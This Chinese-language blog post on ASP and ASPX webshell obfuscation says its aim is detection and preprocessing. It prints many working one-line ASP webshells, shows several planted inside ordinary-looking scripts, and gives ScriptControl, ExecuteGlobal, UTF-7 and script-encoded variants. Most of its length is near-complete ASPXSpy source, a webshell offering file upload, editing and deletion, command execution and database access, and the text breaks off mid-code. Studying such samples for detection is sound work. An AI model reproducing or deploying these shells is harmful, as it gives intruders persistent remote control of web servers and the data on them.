0. 引言 1. ASP WEBSHELL变形方式 2. ASPX WEBSHELL变形方式 3. VBScript.encode
0. 引言
对于ASP、ASPX Webshell而言,纯语言层面的变形方式并不是很多(出去vbscript.encode之外),大部分是大马,所以解决这类webshell的发现和查杀问题,关键点就在于如何进行文本预处理,即在检测前,先对待检测样本进行vbscript解密
0x1: Visual Basic
0x2: PowerShell Webshell
PowerShell is an automation platform and scripting language for Windows and Windows Server that allows you to simplify the management of your systems. Unlike other text-based shells, PowerShell harnesses the power of the .NET Framework, providing rich objects and a massive set of built-in functionality for taking control of your Windows environments.
0x3: PowerShell Desired State Configuration (DSC)
DSC is a new management platform in Windows PowerShell that enables deploying and managing configuration data for software services and managing the environment in which these services run.
DSC provides a set of Windows PowerShell language extensions, new Windows PowerShell cmdlets, and resources that you can use to declaratively specify how you want your software environment to be configured. It also provides a means to maintain and manage existing configurations.
1. Practical applications
Following are some example scenarios where you can use built-in DSC resources to configure and manage a set of computers (also known as target nodes) in an automated way:
1. Enabling or disabling server roles and features 2. Managing registry settings 3. Managing files and directories 4. Starting, stopping, and managing processes and services 5. Managing groups and user accounts 6. Deploying new software 7. Managing environment variables 8. Running Windows PowerShell scripts 9. Fixing a configuration that has drifted away from the desired state 10. Discovering the actual configuration state on a given node
0x4: PowerShell ISE
The PowerShell Integrated Scripting Environment (ISE) is a Windows application that supports enhanced usage of PowerShell for beginners and experts alike. The ISE‘s many features include:
1. A built-in editor for writing, testing, and debugging scripts 2. Full IntelliSense tab completion, syntax highlighting, and context-sensitive help 3. A myriad of keyboard shortcuts 4. Support for right-to-left languages 5. Extensible add-ons (like these from our community)
Relevant Link:
1. ASP变形方式
0x1: 一句话木马
<% execute request("op") %> <% eval request("op") %> <%execute request("#")%> <%execute request(chr(35))%> <%eval request("#")%>
0x2: 正常文件插马
<% @Language="VBScript" %> <% Option Explicit On Error Resume Next execute request("op") Response.Buffer = True Dim nVar, strVar, i nVar = 10 strVar = "Hello World" For i=1 To nVar Response.Write strVar Response.Write "<br>" Next Response.End %>
<% @Language="VBScript" %> <% Option Explicit eval request("op") Response.Buffer = True Dim nVar, strVar, i nVar = 10 strVar = "Hello World" For i=1 To nVar Response.Write strVar Response.Write "<br>" Next Response.End %>
0x3: 利用ASPASP Built-in Objects执行WEBSHELL
<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language = "VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.AddObject "session", session ms.AddObject "server", server ms.AddObject "application", application ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))") ‘‘密码: # %>
1. ASP内置对象: server 创建Objects对象
The CreateObject method creates an instance of a server component. If the component has implemented the OnStartPage and OnEndPage methods, the OnStartPage method is called at this time.
CreateObject( progID ) //progID: Specifies the type of object to create. The format for progID is [Vendor.] Component[ .Version].
2. MSScriptControl.ScriptControl.1对象
Microsoft(R) Script 控件使用户可以创建运行任何 ActiveX(R) scripting 引擎,例如 Microsoft(R) Visual Basic (R) Scripting Edition 或Microsoft(R) JScript(TM) 的应用程序。用户可以将任何 Automation 对象的对象模型添加到 Script 控件中,这样该对象的方法和属性就可以为 scripting 引擎所使用。通过将某个应用程序的对象模型和某个scripting 引擎加以综合,用户就可以创建一个结合了两方面优点的 scripting 应用程序。应用程序不但具有 scripting 语言的简单化特点,而且综合了一种更高级、具有完整特性的专业应用程序的对象、方法,以及属性
Microsoft Script 控件可作为一个控件或者作为一个独立的 Automation 对象创建出来。该特性可以使得用任何语言书写的应用程序都可以用 ScriptControl 宿主任何兼容的 scripting 语言
3. 选择一种Scripting 语言
为 Script Control 配置正确的 scripting 语言。当在某页上作为控件创建 Script Control 时,Language 属性就被自动初始化为 "VBScript"。当作为一个 Automation 对象来创建 Script Control 时,则Language 属性留作未初始化的状态,而必须由代码作者对其进行设置,若要将 Language 属性设置为 JScript,可使用 Properties 窗口。用户也可以在代码中使用 Language 属性,如下所示
ScriptControl1.Language = "JScript" //其他 scripting 语言,例如 PERL 和 REXX,都不是由 Microsoft 所提供的,也可以为 Script 控件所用
4. Let host application to expose an object model to the script code
ms.AddObject "Response", Response ms.AddObject "request", request ms.AddObject "session", session ms.AddObject "server", server ms.AddObject "application", application
0x4: ExecuteGlobal执行WEBSHELL
<%ExecuteGlobal request(chr(35))%>
0x5: script标签中部署WEBSHELL代码
<script language=VBScript runat=server> if request(chr(35))<>"""" then ExecuteGlobal request(chr(35)) </script>
<%@ codepage=65000%> <% response.Charset="936"%> <%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
Relevant Link:
0x7: MS Script Encoder Decoded(VBScript)
1. VBScript 是微软公司出品的脚本语言,VBScript 是微软的编程语言 Visual Basic 的轻量级的版本,同时它也是ASP (Active Server Pages)默认使用的脚本语言 2. 将 <%@ language="language" %> 这一行写到 <html> 标签的上面,就可以使用另外一种脚本语言来编写子程序或者函数: /* <% @Language="VBScript" %> <% .. %> */
微软为ASP提供了一个Script Encoder工具,可以将ASP中的VBScript或JScript编码,让整个ASP脚本文件看起来像一个乱码文件,例如
<script language="VBScript.Encode"> #@~^[email protected]#@&j1D bwYc214W,J3x1W[roPbdP1WW^[email protected]#@&PQsAAA==^#[email protected]</script>
Relevant Link:
对于ASPX.NET C# WEBSHELL来说,变形的方式较少,大多属于功能齐全的大马
0x1: aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %> <%@ import Namespace="System.IO" %> <%@ import Namespace="System.Diagnostics" %> <%@ import Namespace="System.Data" %> <%@ import Namespace="System.Data.OleDb" %> <%@ import Namespace="Microsoft.Win32" %> <%@ import Namespace="System.Net.Sockets" %> <%@ Assembly Name="System.DirectoryServices, Version=, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <script runat="server"> /* Thanks Snailsor,FuYu Code by Bin Make in China Blog: E-mail : [email protected] */ public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin public string SessionName = "ASPXSpy"; public string Bin_Action = ""; public string Bin_Request = ""; protected OleDbConnection conn = new OleDbConnection(); protected OleDbCommand comm = new OleDbCommand(); protected void Page_Load(object sender, EventArgs e) { if (Session[SessionName] != "BIN") { Bin_login(); } else { if (!IsPostBack) { Bin_main(); } else { Bin_Action = Request["goaction"]; if (Bin_Action == "del") { Bin_Request = Request["todo"]; Bin_Filedel(Bin_Request, 1); } if (Bin_Action == "change") { Bin_Request = Request["todo"]; Bin_FileList(Bin_Request); } if (Bin_Action == "deldir") { Bin_Request = Request["todo"]; Bin_Filedel(Bin_Request, 2); } if (Bin_Action == "down") { Bin_Request = Request["todo"]; Bin_Filedown(Bin_Request); } if (Bin_Action == "rename") { Bin_Request = Request["todo"]; Bin_FileRN(Bin_Request, 1); } if (Bin_Action == "renamedir") { Bin_Request = Request["todo"]; Bin_FileRN(Bin_Request, 2); } if (Bin_Action == "showatt") { Bin_Request = Request["todo"]; Bin_Fileatt(Bin_Request); } if (Bin_Action == "edit") { Bin_Request = Request["todo"]; Bin_FileEdit(Bin_Request); } if (Bin_Action == "postdata") { Bin_Request = Request["todo"]; Session["Bin_Table"] = Bin_Request; Bin_DataGrid.CurrentPageIndex = 0; Bin_DBstrTextBox.Text = ""; Bin_Databind(); } if (Bin_Action == "changedata") { Session["Bin_Table"] = null; Bin_Request = Request["todo"]; Session["Bin_Option"] = Request["intext"]; Bin_Change(); Bin_DBinfoLabel.Visible = false; Bin_DBstrTextBox.Text = Bin_Request; } if (Session["Bin_Table"] != null) { Bin_Databind(); } } } } public void Bin_login() { Bin_LoginPanel.Visible = true; Bin_MainPanel.Visible = false; Bin_MenuPanel.Visible = false; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; } public void Bin_main() { TimeLabel.Text = DateTime.Now.ToString(); Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_LoginPanel.Visible = false; Bin_MainPanel.Visible = true; Bin_MenuPanel.Visible = true; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>"; string HostName = "HostName : " + Environment.MachineName + "<br>"; string OS = "OS Version : " + Environment.OSVersion + "</br>"; string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>"; string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>"; InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>"; InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>"; InfoLabel.Text += Bin_Process() + "<hr>"; } private bool CheckIsNumber(string sSrc) { System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$"); if (reg.IsMatch(sSrc)) { return true; } else { return false; } } public string Bin_iisinfo() { string iisinfo = ""; string iisstart = ""; string iisend = ""; string iisstr = "IIS://localhost/W3SVC"; int i = 0; try { DirectoryEntry mydir = new DirectoryEntry(iisstr); iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"; foreach (DirectoryEntry child in mydir.Children) { if (CheckIsNumber(child.Name.ToString())) { string dirstr = child.Name.ToString(); string tmpstr = ""; DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr); DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir"); iisinfo += "<TR><TD align=center>" + (i = i + 1) + "</TD>"; iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>"; iisinfo += "<TD>" + child.Properties["ServerBindings"][0] + "</TD>"; iisinfo += "<TD><a href=javascript:Command(‘change‘,‘" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "‘);>" + newdir1.Properties["Path"].Value + "</a></TD>"; iisinfo += "</TR>"; } } iisend = "</TABLE><hr>"; } catch (Exception error) { Bin_Error(error.Message); } return iisstart + iisinfo + iisend; } public string Bin_Process() { string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>"; string prostr = ""; string htmlend = "</TR></TABLE>"; try { Process[] myprocess = Process.GetProcesses(); foreach (Process p in myprocess) { prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>"; prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>"; prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>"; prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>"; } } catch (Exception Error) { Bin_Error(Error.Message); } return htmlstr + prostr + htmlend; } protected void LoginButton_Click(object sender, EventArgs e) { string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower(); if (MD5Pass == Password) { Session[SessionName] = "BIN"; Bin_main(); } else { Bin_login(); } } protected void LogoutButton_Click(object sender, EventArgs e) { Session.Abandon(); Bin_login(); } protected void FileButton_Click(object sender, EventArgs e) { Bin_LoginPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_MainPanel.Visible = false; Bin_FilePanel.Visible = true; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_upTextBox.Text = formatpath(Server.MapPath(".")); Bin_CopyTextBox.Text = formatpath(Server.MapPath(".")); Bin_upTextBox.Text = formatpath(Server.MapPath(".")); Bin_FileList(Server.MapPath(".")); } protected void MainButton_Click(object sender, EventArgs e) { Bin_main(); } public void Bin_DriveList() { string file = "<input type=hidden name=goaction><input type=hidden name=todo>"; file += "<hr>Drives : "; string[] drivers = Directory.GetLogicalDrives(); for (int i = 0; i < drivers.Length; i++) { file += "<a href=javascript:Command(‘change‘,‘" + formatpath(drivers[i]) + "‘);>" + drivers[i] + "</a> "; } file += " WebRoot : <a href=javascript:Command(‘change‘,‘" + formatpath(Server.MapPath(".")) + "‘);>" + Server.MapPath(".") + "</a>"; Bin_FileLabel.Text = file; } public void Bin_FileList(string Bin_path) { Bin_FilePanel.Visible = true; Bin_CreateTextBox.Text = ""; Bin_CopytoTextBox.Text = ""; Bin_CopyTextBox.Text = Bin_path; Bin_upTextBox.Text = Bin_path; Bin_IISPanel.Visible = false; Bin_DriveList(); string tmpstr=""; string Bin_Filelist = Bin_FilelistLabel.Text; Bin_Filelist = "<hr>"; Bin_Filelist += "<table width=90% border=0 align=center>"; Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>"; Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>"; try { Bin_Filelist += "<tr><td>"; string parstr = ""; if (Bin_path.Length < 4) { parstr = formatpath(Bin_path); } else { parstr = formatpath(Directory.GetParent(Bin_path).ToString()); } Bin_Filelist += "<i><b><a href=javascript:Command(‘change‘,‘" + parstr + "‘);>|Parent Directory|</a></b></i>"; Bin_Filelist += "</td></tr>"; DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path); foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories()) { string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name); tmpstr += "<tr>"; tmpstr += "<td><a href=javascript:Command(‘change‘,‘" + foldername + "‘)>" + Bin_folder.Name + "</a></td><td><b><i><dir></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command(‘renamedir‘,‘" + foldername + "‘);>Ren</a>|<a href=javascript:Command(‘showatt‘,‘" + foldername + "/‘);>Att</a>|<a href=javascript:Command(‘deldir‘,‘" + foldername + "‘);>Del</a></td>"; tmpstr += "</tr>"; } foreach (FileInfo Bin_file in Bin_dir.GetFiles()) { string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name); tmpstr += "<tr>"; tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command(‘edit‘,‘" + filename + "‘);>Edit</a>|<a href=javascript:Command(‘rename‘,‘" + filename + "‘);>Ren</a>|<a href=javascript:Command(‘down‘,‘" + filename + "‘);>Down</a>|<a href=javascript:Command(‘showatt‘,‘" + filename + "‘);>Att</a>|<a href=javascript:Command(‘del‘,‘" + filename + "‘);>Del</a></td>"; tmpstr += "</tr>"; } tmpstr += "</talbe>"; } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FilelistLabel.Text = Bin_Filelist + tmpstr; } public void Bin_Filedel(string instr,int type) { try { if (type == 1) { File.Delete(instr); } if (type == 2) { foreach (string tmp in Directory.GetFileSystemEntries(instr)) { if (File.Exists(tmp)) { File.Delete(tmp); } else { Bin_Filedel(tmp, 2); } } Directory.Delete(instr); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } public void Bin_FileRN(string instr,int type) { try { if (type == 1) { string[] array = instr.Split(‘,‘); File.Move(array[0], array[1]); } if (type == 2) { string[] array = instr.Split(‘,‘); Directory.Move(array[0], array[1]); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } public void Bin_Filedown(string instr) { try { FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read); long FileSize = MyFileStream.Length; byte[] Buffer = new byte[(int)FileSize]; MyFileStream.Read(Buffer, 0, (int)FileSize); MyFileStream.Close(); Response.AddHeader("Content-Disposition", "attachment;filename=" + instr); Response.Charset = "UTF-8"; Response.ContentType = "application/octet-stream"; Response.BinaryWrite(Buffer); Response.Flush(); Response.End(); } catch (Exception Error) { Bin_Error(Error.Message); } } public void Bin_Fileatt(string instr) { Bin_AttPanel.Visible = true; Bin_FilePanel.Visible = true; try { string Att = File.GetAttributes(instr).ToString(); Bin_ReadOnlyCheckBox.Checked = false; Bin_SystemCheckBox.Checked = false; Bin_HiddenCheckBox.Checked = false; Bin_ArchiveCheckBox.Checked = false; if (Att.LastIndexOf("ReadOnly") != -1) { Bin_ReadOnlyCheckBox.Checked = true; } if (Att.LastIndexOf("System") != -1) { Bin_SystemCheckBox.Checked = true; } if (Att.LastIndexOf("Hidden") != -1) { Bin_HiddenCheckBox.Checked = true; } if (Att.LastIndexOf("Archive") != -1) { Bin_ArchiveCheckBox.Checked = true; } Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString(); Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString(); Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString(); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_AttLabel.Text = instr; Session["FileName"] = instr; Bin_DriveList(); } public void Bin_FileEdit(string instr) { Bin_FilePanel.Visible = true; Bin_EditPanel.Visible = true; Bin_DriveList(); Bin_EditpathTextBox.Text = instr; StreamReader SR = new StreamReader(instr, Encoding.Default); Bin_EditTextBox.Text = SR.ReadToEnd(); SR.Close(); } protected void Bin_upButton_Click(object sender, EventArgs e) { string uppath = Bin_upTextBox.Text; if (uppath.Substring(uppath.Length - 1, 1) != @"/") { uppath = uppath + @"/"; } try { Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value)); } catch (Exception error) { Bin_Error(error.Message); } Bin_FileList(uppath); } public void Bin_Error(string error) { Bin_ErrorLabel.Text = "Error : " + error; } public string formatpath(string instr) { instr = instr.Replace(@"\", "/"); if (instr.Length < 4) { instr = instr.Replace(@"/", ""); } if (instr.Length == 2) { instr = instr + @"/"; } instr = instr.Replace(" ", "%20"); return instr; } public string formatfile(string instr) { instr = instr.Replace(" ", "%20"); return instr; } protected void Bin_GoButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_NewFileButton_Click(object sender, EventArgs e) { string newfile = Bin_CreateTextBox.Text; string filepath = Bin_upTextBox.Text; filepath = filepath + "/" + newfile; try { StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } protected void Bin_NewdirButton_Click(object sender, EventArgs e) { string dirpath = Bin_upTextBox.Text; string newdir = Bin_CreateTextBox.Text; newdir = dirpath + "/" + newdir; try { Directory.CreateDirectory(newdir); } catch(Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CopyButton_Click(object sender, EventArgs e) { string copystr = Bin_CopyTextBox.Text; string copyto = Bin_CopytoTextBox.Text; try { File.Copy(copystr, copyto); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_CopytoTextBox.Text = ""; Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CutButton_Click(object sender, EventArgs e) { string copystr = Bin_CopyTextBox.Text; string copyto = Bin_CopytoTextBox.Text; try { File.Move(copystr, copyto); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_CopytoTextBox.Text = ""; Bin_FileList(Bin_upTextBox.Text); } protected void Bin_SetButton_Click(object sender, EventArgs e) { try { string FileName = Session["FileName"].ToString(); File.SetAttributes(FileName, FileAttributes.Normal); if (Bin_ReadOnlyCheckBox.Checked) { File.SetAttributes(FileName, FileAttributes.ReadOnly); } if (Bin_SystemCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System); } if (Bin_HiddenCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden); } if (Bin_ArchiveCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive); } if (FileName.Substring(FileName.Length - 1, 1) == "/") { Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text)); Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text)); Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text)); } else { File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text)); File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text)); File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text)); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); Response.Write("<script>alert(‘Success!‘)</sc" + "ript>"); } protected void Bin_EditButton_Click(object sender, EventArgs e) { try { StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default); SW.Write(Bin_EditTextBox.Text); SW.Close(); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); Response.Write("<script>alert(‘Success!‘)</sc" + "ript>"); } protected void Bin_BackButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_SbackButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CmdButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = true; Bin_SQLPanel.Visible = false; Bin_CmdLabel.Text = ""; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; } protected void Bin_RunButton_Click(object sender, EventArgs e) { try { Process Cmdpro = new Process(); Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text; Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text; Cmdpro.StartInfo.UseShellExecute = false; Cmdpro.StartInfo.RedirectStandardInput = true; Cmdpro.StartInfo.RedirectStandardOutput = true; Cmdpro.StartInfo.RedirectStandardError = true; Cmdpro.Start(); string cmdstr = Cmdpro.StandardOutput.ReadToEnd(); cmdstr = cmdstr.Replace("<", "<"); cmdstr = cmdstr.Replace(">", ">"); Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>"; } catch (Exception Error) { Bin_Error(Error.Message); } } protected void Bin_SQLButton_Click(object sender, EventArgs e) { Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_Scroll.Visible = false; Bin_DBmenuPanel.Visible = false; Bin_dirPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible =false; } protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e) { Session["Bin_Table"] = null; Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB"; Bin_SQLRadioButton.Checked = true; Bin_AccRadioButton.Checked = false; Bin_AccPanel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_DBmenuPanel.Visible = false; Bin_dirPanel.Visible = false; } protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e) { Session["Bin_Table"] = null; Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb"; Bin_SQLRadioButton.Checked = false; Bin_AccRadioButton.Checked = true; Bin_DBmenuPanel.Visible = false; Bin_AccPanel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_dirPanel.Visible = false; } protected void OpenConnection() { if (conn.State == ConnectionState.Closed) { try { conn.ConnectionString = Bin_SQLconnTextBox.Text; comm.Connection = conn; conn.Open(); } catch (Exception Error) { Bin_Error(Error.Message); } } } protected void CloseConnection() { if (conn.State == ConnectionState.Open) conn.Close(); conn.Dispose(); comm.Dispose(); } public DataTable Bin_DataTable(string sqlstr) { OleDbDataAdapter da = new OleDbDataAdapter(); DataTable datatable = new DataTable(); try { OpenConnection(); comm.CommandType = CommandType.Text; comm.CommandText = sqlstr; da.SelectCommand = comm; da.Fill(datatable); } catch (Exception) { } finally { CloseConnection(); } return datatable; } protected void SQL_SumbitButton_Click(object sender, EventArgs e) { try { Session["Bin_Table"] = null; Bin_DataGrid.CurrentPageIndex = 0; Bin_DataGrid.AllowPaging = true; if (Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; Bin_DBinfoLabel.Visible = true; Bin_AccPanel.Visible = false; Bin_Scroll.Visible = false; Bin_dirPanel.Visible = false; OpenConnection(); DataTable ver = Bin_DataTable(@"SELECT @@VERSION"); DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases"); DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()"); DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER(‘sysadmin‘)"); DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER(‘db_owner‘)"); string dbo = ""; if (owner.Rows[0][0].ToString() == "1") { dbo = "db_owner"; } else { dbo = "public"; } if (rol.Rows[0][0].ToString() == "1") { dbo = "<font color=blue>sa</font>"; } string db_info = ""; db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>"; string db_name = ""; for (int i = 0; i < dbs.Rows.Count; i++) { db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + " | "; } db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>"; db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>"; Bin_DBinfoLabel.Text = db_info; } if (Bin_AccRadioButton.Checked) { Bin_DataGrid.Visible = false; Bin_SAexecButton.Visible = false; Bin_Accbind(); } } catch (Exception E) { Bin_Error(E.Message); } } protected void Bin_Accbind() { try { Bin_DBmenuPanel.Visible = false; Bin_AccPanel.Visible = true; OpenConnection(); DataTable acctable = new DataTable(); acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" }); string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>"; accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!=‘‘)Command(‘postdata‘,this);>"; for (int i = 0; i < acctable.Rows.Count; i++) { accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>"; } if (Session["Bin_Table"] != null) { accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>"; } accstr += "</SELECT>"; Bin_AccinfoLabel.Text = accstr; CloseConnection(); } catch (Exception Error) { Bin_Error(Error.Message); } } protected void Bin_Databind() { try { Bin_SAexecButton.Visible = false; Bin_Accbind(); Bin_Scroll.Visible = true; if (Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; Bin_DBinfoLabel.Visible = false; } Bin_DataGrid.Visible = true; DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]); Bin_DataGrid.DataSource = databind; Bin_DataGrid.DataBind(); } catch (Exception Error) { Bin_Error(Error.Message); } } public void Bin_ExecSql(string instr) { try { OpenConnection(); comm.CommandType = CommandType.Text; comm.CommandText = instr; comm.ExecuteNonQuery(); } catch (Exception e) { Bin_Error(e.Message); } } public void Item_DataBound(object sender,DataGridItemEventArgs e) { for (int i = 2; i < e.Item.Cells.Count; i++) { e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">"); } } protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e) { Bin_DataGrid.CurrentPageIndex = e.NewPageIndex; Bin_Databind(); } public void Item_Command(object sender, DataGridCommandEventArgs e) { if (e.CommandName == "Cancel") { Bin_DataGrid.EditItemIndex = -1; Bin_Databind(); } } protected void Bin_ExecButton_Click(object sender, EventArgs e) { try { Bin_Scroll.Visible = true; Bin_DataGrid.Visible = true; Bin_DataGrid.AllowPaging = true; Bin_Accbind(); if (Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; } string sqlstr = Bin_DBstrTextBox.Text; sqlstr = sqlstr.TrimStart().ToLower(); if (sqlstr.Substring(0, 6) == "select") { DataTable databind = Bin_DataTable(sqlstr); Bin_DataGrid.DataSource = databind; Bin_DataGrid.DataBind(); } else { Bin_ExecSql(sqlstr); Bin_Databind(); } } catch(Exception error) { Bin_Error(error.Message); } } protected void Bin_BDButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_Accbind(); Bin_DBmenuPanel.Visible = true; Bin_DataGrid.Visible = false; Bin_DataGrid.AllowPaging = true; Bin_Scroll.Visible = false; Bin_DBstrTextBox.Text = ""; Bin_SAexecButton.Visible = false; Bin_ResLabel.Visible = false; Bin_dirPanel.Visible = false; } protected void Bin_SACMDButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_SAexecButton.Visible = 